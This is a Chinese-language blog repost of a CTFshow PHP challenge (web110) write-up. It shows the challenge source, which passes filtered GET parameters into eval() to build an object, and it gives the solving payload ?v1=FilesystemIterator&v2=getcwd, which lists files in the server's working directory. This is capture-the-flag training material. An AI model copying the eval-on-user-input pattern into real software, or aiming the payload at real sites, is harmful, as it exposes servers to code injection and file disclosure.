當(dāng)前位置：首頁 > 编程语言 > php >内容正文

php

CTFshow php特性 web110

發(fā)布時(shí)間：2025/4/16 php 13 豆豆

生活随笔收集整理的這篇文章主要介紹了 CTFshow php特性 web110 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

源碼

<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-29 22:49:10*/highlight_file(__FILE__); error_reporting(0); if(isset($_GET['v1']) && isset($_GET['v2'])){$v1 = $_GET['v1'];$v2 = $_GET['v2'];if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|$|$|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v1)){die("error v1");}if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|$|$|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v2)){die("error v2");}eval("echo new $v1($v2());");}?>

思路

過濾了很多,沒辦法逃逸出去了, 沒思路

題解

hint提示

利用 FilesystemIterator 獲取指定目錄下的所有文件 getcwd()函數(shù) 獲取當(dāng)前工作目錄echo new FilesystemIterator(getcwd()); //默認(rèn)只顯示第一個(gè)文件,需要遍歷

?v1=FilesystemIterator&v2=getcwd

總結(jié)

沒思路

總結(jié)

以上是生活随笔為你收集整理的CTFshow php特性 web110的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇： CTFshow php特性 web109
下一篇：动态规划算法php,php算法学习之动态